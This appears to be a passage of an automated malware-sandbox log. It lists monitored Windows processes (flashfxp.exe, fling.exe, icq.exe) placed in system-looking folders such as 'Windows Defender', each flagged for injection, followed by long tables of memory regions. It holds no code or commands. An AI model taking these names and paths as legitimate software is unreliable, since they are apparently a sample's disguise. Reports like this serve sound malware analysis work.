os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\Windows Portable Devices\\flashfxp.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Portable Devices\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2894 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2895 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2896 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2897 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2898 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2899 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2900 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2901 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2902 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2903 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2904 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2905 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2906 start_va = 0x490000 end_va = 0x49ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 2907 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2908 start_va = 0x4c0000 end_va = 0x57dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2909 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 2910 start_va = 0x7a0000 end_va = 0x927fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 2911 start_va = 0x930000 end_va = 0xab0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 2912 start_va = 0xac0000 end_va = 0xb7bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 2913 start_va = 0xbe0000 end_va = 0xbeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 2914 start_va = 0xe30000 end_va = 0xe46fff monitored = 0 entry_point = 0xe314a1 region_type = mapped_file name = "flashfxp.exe" filename = "\\Program Files (x86)\\Windows Portable Devices\\flashfxp.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\flashfxp.exe") Region: id = 2915 start_va = 0xe50000 end_va = 0x224ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e50000" filename = "" Region: id = 2916 start_va = 0x2250000 end_va = 0x2c13fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002250000" filename = "" Region: id = 2917 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2918 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2919 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2920 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2921 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2922 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2923 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2924 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2925 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2926 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2927 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2928 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2929 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2930 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2931 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2932 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2933 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2934 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2935 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2936 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2937 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2938 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2939 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2940 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2941 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2942 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2944 start_va = 0x580000 end_va = 0x641fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Thread: id = 133 os_tid = 0x11f8 Process: id = "35" image_name = "fling.exe" filename = "c:\\program files (x86)\\windows defender\\fling.exe" page_root = "0x600ec000" os_pid = "0x11fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\Windows Defender\\fling.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Defender\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2946 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2947 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2948 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2949 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2950 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2951 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2952 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2953 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2954 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2955 start_va = 0x1d0000 end_va = 0x28dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2956 start_va = 0x290000 end_va = 0x290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 2957 start_va = 0x2a0000 end_va = 0x2a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 2958 start_va = 0x2c0000 end_va = 0x2d6fff monitored = 0 entry_point = 0x2c14a1 region_type = mapped_file name = "fling.exe" filename = "\\Program Files (x86)\\Windows Defender\\fling.exe" (normalized: "c:\\program files (x86)\\windows defender\\fling.exe") Region: id = 2959 start_va = 0x320000 end_va = 0x3dbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 2960 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2961 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 2962 start_va = 0x930000 end_va = 0xa2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 2963 start_va = 0xa30000 end_va = 0xbb7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 2964 start_va = 0xbc0000 end_va = 0xd40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 2965 start_va = 0xd50000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 2966 start_va = 0x22d0000 end_va = 0x22dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 2967 start_va = 0x24c0000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 2968 start_va = 0x24d0000 end_va = 0x2e93fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024d0000" filename = "" Region: id = 2969 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2970 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2971 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2972 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2973 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2974 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2975 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2976 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2977 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2978 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2979 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2980 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2981 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2982 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2983 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2984 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2985 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2986 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2987 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2988 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2989 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2990 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2991 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2992 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2993 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2994 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2996 start_va = 0x600000 end_va = 0x786fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Thread: id = 134 os_tid = 0x1200 Process: id = "36" image_name = "icq.exe" filename = "c:\\program files\\windows portable devices\\icq.exe" page_root = "0x5d100000" os_pid = "0x120c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\Windows Portable Devices\\icq.exe\" " cur_dir = "C:\\Program Files\\Windows Portable Devices\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2997 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2998 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2999 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3000 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3001 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3002 start_va = 0xa0000 end_va = 0xa3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 3003 start_va = 0xb0000 end_va = 0xb0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 3004 start_va = 0xc0000 end_va = 0xc1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3005 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3006 start_va = 0x120000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 3007 start_va = 0x130000 end_va = 0x146fff monitored = 0 entry_point = 0x1314a1 region_type = mapped_file name = "icq.exe" filename = "\\Program Files\\Windows Portable Devices\\icq.exe" (normalized: "c:\\program files\\windows portable devices\\icq.exe") Region: id = 3008 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 3009 start_va = 0x1c0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3010 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3011 start_va = 0x400000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3012 start_va = 0x500000 end_va = 0x5bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3013 start_va = 0x6e0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 3014 start_va = 0x7e0000 end_va = 0x967fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 3015 start_va = 0x970000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 3016 start_va = 0xb00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 3017 start_va = 0x1fa0000 end_va = 0x1faffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 3018 start_va = 0x1fb0000 end_va = 0x206bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001fb0000" filename = "" Region: id = 3019 start_va = 0x2070000 end_va = 0x2a33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002070000" filename = "" Region: id = 3020 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3021 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3022 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3023 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3024 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3025 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 3026 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3027 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3028 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3029 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3030 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3031 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3032 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name 